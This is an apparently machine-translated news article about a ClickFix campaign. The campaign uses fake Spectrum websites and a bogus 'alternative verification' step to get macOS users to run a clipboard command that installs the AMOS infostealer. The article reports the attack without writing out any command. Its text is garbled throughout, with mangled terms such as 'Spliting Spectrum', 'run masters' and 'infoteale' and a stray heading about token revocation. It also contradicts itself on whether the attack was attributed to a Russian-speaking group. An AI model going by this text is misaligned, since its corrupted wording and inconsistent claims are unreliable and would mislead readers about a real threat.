- Cloudsek researchers find the falsified version of the Spectrum website
- The site deceives people to run masters through the clickfix method
- The researchers attributed the attack on a Russian speech group
Russian threat actors have been seen using the popular clickfix method to steal passwords and release infostaler malware in macOS targets.
Cloudsek security researchers have reported multiple Spliting Spectrum websites, a telecommunications provider based in the United States. The victims who visit these websites would first be asked to verify that they are human; However, the “verification” was designed to “fail”, after which victims would be asked to use “alternative verification.”
It is not clear why the attackers added the additional step: we can assume that it is to throw the victims and make their guard down.
Access tokens revocation
In any case, the “alternative verification” method copy a command on its clipboard, after which victims are instructed to hit them and execute them on their devices.
The command offers atomicos (AMOS), an infamous infoteale macOS that takes passwords, cryptocurrency wallet data and system information, macOS users.
Cloudsek did not attribute the campaign to any threat actor in particular, but has determined that they are of Russian origin.
“When inspecting the source code of the delivery page, we find a couple of comments in Russian, indicating that malware is probably being spread by Russian -speaking cybercriminals,” said the company.
It does not seem that the campaign was going to a specific group of people or companies, but since it falsifies the spectrum, it is safe to say that the victims are current or potential customers of the company.
The experts noticed that the campaign was configured quite awkwardly: “The poorly implemented logic in the delivery sites, such as the instructions not coinciding on the platforms, points to the infrastructure assembled hurriedly. This campaign highlights a growing trend in the multipatform social engineering attacks aimed at users of consumers and corporate,” Cloudsek concluded.
Clickfix has become quite popular in recent times, with different security outfits that report that discover different variants of the technique in nature.
Through The hacker news
